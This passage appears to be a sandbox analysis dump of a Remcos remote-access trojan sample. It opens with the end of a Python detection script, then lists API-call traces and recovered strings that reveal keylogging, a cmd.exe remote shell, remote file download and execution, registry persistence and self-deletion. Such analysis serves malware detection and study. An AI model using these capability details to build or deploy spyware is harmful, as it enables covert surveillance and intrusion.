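    print(capabilities(found), "remcos" if verdict(found) else "no match")
```

Run it against a real dump with `scan_dump(open(path, "rb").read())`; the offsets let you jump straight to the surrounding configuration in a hex viewer, and the version family catches builds whose status strings were changed.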

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                  • API String ID: 3795512280-1152054767
                                                  • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                  • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                  Control-flow Graph

                                                  • Rendered graph not reproduced; recoverable data: function 004048C8, basic blocks 004048C8-00404A9E, Win32 calls in the graph nodes: connect, WSAGetLastError, CreateEventW (twice) (executed / not-executed colouring lost in extraction)
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                  • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                  Control-flow Graph

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                  • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                  Control-flow Graph

                                                  • Rendered graph not reproduced; recoverable data: function 0040DA6F, basic blocks 0040DA6F-0040DC56, Win32 call in the graph nodes: GetLongPathNameW (executed / not-executed colouring lost in extraction)
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                  Control-flow Graph

                                                  • Rendered graph not reproduced; recoverable data: function 0041C482, basic blocks 0041C482-0041C515, Win32 calls in the graph nodes: CreateFileW, SetFilePointer, WriteFile, CloseHandle (executed / not-executed colouring lost in extraction)
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID: xpF
                                                  • API String ID: 1852769593-354647465
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                                  Control-flow Graph

                                                  • Rendered graph not reproduced; recoverable data: function 0041B354, basic blocks 0041B354-0041B410, Win32 call in the graph nodes: StrToIntA (executed / not-executed colouring lost in extraction)
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 1866151309-2070987746
                                                  • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                  • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                  Control-flow Graph

                                                  • Rendered graph not reproduced; recoverable data: function 0040A6B0, basic blocks 0040A6B0-0040A760, Win32 calls in the graph nodes: CreateFileW, GetFileSize, CloseHandle, Sleep (executed / not-executed colouring lost in extraction)
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: XQG
                                                  • API String ID: 1958988193-3606453820
                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                  • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: SG
                                                  • API String ID: 1925916568-3189917014
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                  • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                  • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: pQG
                                                  • API String ID: 176396367-3769108836
                                                  APIs
                                                  • _free.LIBCMT ref: 00446227
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                  Similarity
                                                  • API ID: Heap$AllocAllocate_free
                                                  • String ID:
                                                  • API String ID: 2447670028-0
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  APIs
                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  Similarity
                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                  • String ID:
                                                  • API String ID: 1170566393-0
                                                  APIs
                                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                  • _free.LIBCMT ref: 004501C0
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                  • API String ID: 1067849700-181434739
                                                  • Opcode ID: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                  • Opcode Fuzzy Hash: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                  • API String ID: 2994406822-18413064
                                                  • Opcode ID: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                  • Opcode Fuzzy Hash: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
